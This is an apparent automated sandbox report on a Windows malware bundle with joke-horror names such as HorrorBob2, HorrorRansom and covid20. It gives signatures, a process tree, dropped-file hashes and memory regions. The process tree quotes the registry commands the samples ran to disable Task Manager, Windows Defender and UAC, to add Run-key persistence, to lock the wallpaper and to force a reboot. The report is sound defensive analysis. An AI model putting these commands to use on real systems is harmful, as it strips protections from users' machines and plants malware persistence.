Analysis

  • max time kernel
    11s
  • max time network
    14s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-11-2024 14:13

Errors

Reason
Machine shutdown

General

  • Target

    Dest/Start.bat

  • Size

    59B

  • MD5

    e802087cce5e0317e5badc64380d207b

  • SHA1

    64e1f2a59da7caf0f1c206464724863db8829aaf

  • SHA256

    c72166dd069087612430540b67d4771bae3899e9d928b587ca8ac24dd458c2e3

  • SHA512

    e82a80520f5a9119bb45ce83a327f99dafc60c7b97b7754ac2ffdcbbea02c027a85f639f525da4ba869ae36837832d95eb846fd6c17304a749d094185691f406

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
  • Disables Task Manager via registry modification
  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 6 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
      "covid20.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4780
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:572
        • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
          clwcp c:\covid20\bg.bmp
          4⤵
          • Executes dropped EXE
          • Sets desktop wallpaper using registry
          • System Location Discovery: System Language Discovery
          PID:752
        • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
          flasher 5 c:\covid20\covid.bmp
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4088
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2108
    • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
      "HorrorBob2.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5032
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:828
        • C:\Windows\SysWOW64\cscript.exe
          cscript prompt.vbs
          4⤵
            PID:1876
          • C:\Windows\SysWOW64\reg.exe
            reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:5052
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
            4⤵
            • Sets desktop wallpaper using registry
            • System Location Discovery: System Language Discovery
            PID:4156
          • C:\Windows\SysWOW64\rundll32.exe
            RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1368
          • C:\Windows\SysWOW64\reg.exe
            reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:3356
          • C:\Windows\SysWOW64\reg.exe
            Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            PID:3468
          • C:\Windows\SysWOW64\reg.exe
            reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            4⤵
            • UAC bypass
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:4764
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
            4⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            PID:3344
          • C:\Windows\SysWOW64\net.exe
            net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2644
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3352
          • C:\Windows\SysWOW64\shutdown.exe
            shutdown /r /t 00
            4⤵
              PID:756
        • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
          "HorrorRansom 1.0 Final.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2116
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd""
            3⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3408
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:3184
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
              4⤵
              • Sets desktop wallpaper using registry
              • System Location Discovery: System Language Discovery
              PID:1420
            • C:\Windows\SysWOW64\reg.exe
              reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
              4⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:3680
            • C:\Windows\SysWOW64\reg.exe
              reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
              4⤵
              • UAC bypass
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:3096
            • C:\Windows\SysWOW64\reg.exe
              Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1672
            • C:\Windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
              4⤵
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              PID:4364
            • C:\Windows\SysWOW64\shutdown.exe
              shutdown /r /t 00
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:3152
        • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
          "HorrorTrojan Ultimate Edition.exe"
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1516
          • C:\Windows\system32\wscript.exe
            "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs //Nologo
            3⤵
              PID:4332
          • C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
            "HorrorTrojan123.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:1724
        • C:\Windows\system32\LogonUI.exe
          "LogonUI.exe" /flags:0x4 /state0:0xa3a06855 /state1:0x41c64e6d
          1⤵
          • Drops file in Windows directory
          • Modifies data under HKEY_USERS
          • Suspicious use of SetWindowsHookEx
          PID:2552
        • C:\Windows\system32\DllHost.exe
          C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
          1⤵
            PID:3152
          • C:\Windows\system32\DllHost.exe
            C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
            1⤵
              PID:1876
            • C:\Windows\system32\DllHost.exe
              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
              1⤵
                PID:4156
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                1⤵
                  PID:756
                • C:\Windows\system32\DllHost.exe
                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                  1⤵
                    PID:572

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs

                    Filesize

                    2KB

                    MD5

                    a0679dce64fcf875f4208b823d4b85c0

                    SHA1

                    85abe3673db82bfe5b2c207dc98648e32afffea0

                    SHA256

                    85a07013575a6a890c7b1d26adaa52f17616c4cca673617aa1fc0992aa29dda1

                    SHA512

                    1e2740a09acc5b0d679acfd740feb3556638f1b6029078668bbb7e067b356fcecf23c5b317b02888822cc180c0eb5cb7e2caf63d92a74515ebc5a1031d80f3a6

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe

                    Filesize

                    505KB

                    MD5

                    e62ee6f1efc85cb36d62ab779db6e4ec

                    SHA1

                    da07ec94cf2cb2b430e15bd0c5084996a47ee649

                    SHA256

                    13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a

                    SHA512

                    8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\bg.bmp

                    Filesize

                    21.5MB

                    MD5

                    cb065726febf9c1a581f3008e678f524

                    SHA1

                    f9a0058a57213cf7ce72eddf0616a938c8f4f4b1

                    SHA256

                    d8f864128f2a79e2ff8179255ebfd06619325fec86103722b6418c3cbb41823f

                    SHA512

                    b54a81cff5951b34478e777bc27cc4fd4a292b548f38162602c01e2594848e40fcfea5becfd789153c9a4fa75c354834a3a37cf3032c9857e9246bf850d24880

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs

                    Filesize

                    130B

                    MD5

                    e61624dced063c4ba5352bf487f12410

                    SHA1

                    40bd08928900cd97f444ffaa78d93dcaf913b274

                    SHA256

                    82ac48c4f7edbab182aa0a8c320d5616ccdd2f0e83dc733b91e45521f85462a3

                    SHA512

                    2a27db12d2af35e7b51a307eb8860800075867922d3d63a69da608c96bec045f3c64ac757674d2a40d7f4d9e55179fc2bddc17691919e18e109a5d4669c607ac

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat

                    Filesize

                    445B

                    MD5

                    b08e02e536917f897acb2d21f42f0a97

                    SHA1

                    a078f1addfd3eeb0f0cb5fd206ff78e9dc0f3e45

                    SHA256

                    2c68caeada2c251c5fc12694b7288a5790114ced4142867179e75d313efaa50c

                    SHA512

                    1d1901c3c676bb6d99a39d1a0bab1a6ee378090390bb5e7fe66cf754b8dd772ac0b79ba1215fa758445db1deac200afcc5e1e1e32b2562df946c82b530ca95ab

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bmp

                    Filesize

                    147KB

                    MD5

                    738bbd119d8877f8342e1ff00fe60dff

                    SHA1

                    fc11d85e3c5b46bd877e06985fec1a601ce396ed

                    SHA256

                    548c9e22a04650efec06a0414d205d24600e08e0fac1beed7e8b4c03730962bb

                    SHA512

                    f7a12c9a1403c9a1953387c5871d6e7865ba80c405f37c51f5c3e093bab9235b8a8ba62ad8b27f2079407e9672d47ac365c9cb08033ef349bd8c9906a30fefad

                  • C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe

                    Filesize

                    246KB

                    MD5

                    9254ca1da9ff8ad492ca5fa06ca181c6

                    SHA1

                    70fa62e6232eae52467d29cf1c1dacb8a7aeab90

                    SHA256

                    30676ad5dc94c3fec3d77d87439b2bf0a1aaa7f01900b68002a06f11caee9ce6

                    SHA512

                    a84fbbdea4e743f3e41878b9cf6db219778f1479aa478100718af9fc8d7620fc7a3295507e11df39c7863cb896f946514e50368db480796b6603c8de5580685a

                  • C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd

                    Filesize

                    1KB

                    MD5

                    47f426fb3883f2da30e9aa2a7d693fa5

                    SHA1

                    50d843d68817717f21ba96d26a571ad996a5e35a

                    SHA256

                    b1c9a35d14eec5c522fd82babfae348dc244996f75d36543347208acf6f0f85b

                    SHA512

                    2e588a0d6e2fb86e447d165d28b0600a9fe6fd670b391f70a918c333259a5b171a18837c73927c3a6de3240557b1860fe7bc616801c3dc16b9d6373c362ffacb

                  • C:\Users\Admin\AppData\Local\Temp\C18B.tmp\HostFile.exe

                    Filesize

                    72KB

                    MD5

                    c875f76e521f520404401122bd82630a

                    SHA1

                    3b1c78420a55b9a768b28168753c4e22982421ef

                    SHA256

                    a58caeb57da3061620dccfc374b2fba87c3061d981782d47a5dcc287e1db1d11

                    SHA512

                    b712f09c1b5fcee804da12c45e2404b265b9a18e40b9ede4f6336e3a42086e1b02bfe9ba1b5ec487251e6d96b15f5ed4a179690a8f4ae2cc36454a15f136b54b

                  • C:\Users\Admin\AppData\Local\Temp\C18B.tmp\note.bmp

                    Filesize

                    5.9MB

                    MD5

                    ed30c76a614ec8db5e4ac22e2929f53d

                    SHA1

                    27ab24ede0ec37cedd2cbf4d9f7135375f031fa4

                    SHA256

                    96df16e4bef56e83f8f1106834aa23caf05972549d1c24c1f7def12e6ef4d21a

                    SHA512

                    ec941a162de8fb1b32a71256ba11104775ff67424a6098e61f8d362ecc6547458e1cc4343dacd2b8df359da487d66832c2813e951d733b29803402f8206dfa8b

                  • C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat

                    Filesize

                    5KB

                    MD5

                    b11c0b55dba339bbe3169584fa0eedd8

                    SHA1

                    8c201122fd73cea5d8d2aa2aa6f7c17d99b521d9

                    SHA256

                    f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073

                    SHA512

                    8424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006

                  • C:\Users\Admin\AppData\Local\Temp\C498.tmp\Service64.exe

                    Filesize

                    11.4MB

                    MD5

                    b53852cb556ec28efc39b986caddb791

                    SHA1

                    5ce0819a7b1703f67272fa0f21546d0a8b2d7b0a

                    SHA256

                    ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a

                    SHA512

                    7da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599

                  • C:\Users\Admin\AppData\Local\Temp\C498.tmp\blood.bmp

                    Filesize

                    3.8MB

                    MD5

                    040d29b801e3488f7aee3f9708128eea

                    SHA1

                    433591a971325f7529cbb7a1d16645ff65ee10c7

                    SHA256

                    fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de

                    SHA512

                    79c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826

                  • memory/752-78-0x0000000000400000-0x0000000000484000-memory.dmp

                    Filesize

                    528KB

                  • memory/2116-1-0x0000000000400000-0x0000000000A12000-memory.dmp

                    Filesize

                    6.1MB

                  • memory/2116-81-0x0000000000400000-0x0000000000A12000-memory.dmp

                    Filesize

                    6.1MB

                  • memory/4088-77-0x0000000000400000-0x00000000004A4000-memory.dmp

                    Filesize

                    656KB

                  • memory/4780-0-0x0000000000400000-0x0000000001A7B000-memory.dmp

                    Filesize

                    22.5MB

                  • memory/4780-79-0x0000000000400000-0x0000000001A7B000-memory.dmp

                    Filesize

                    22.5MB

                  • memory/5032-2-0x0000000000400000-0x000000000132F000-memory.dmp

                    Filesize

                    15.2MB

                  • memory/5032-76-0x0000000000400000-0x000000000132F000-memory.dmp

                    Filesize

                    15.2MB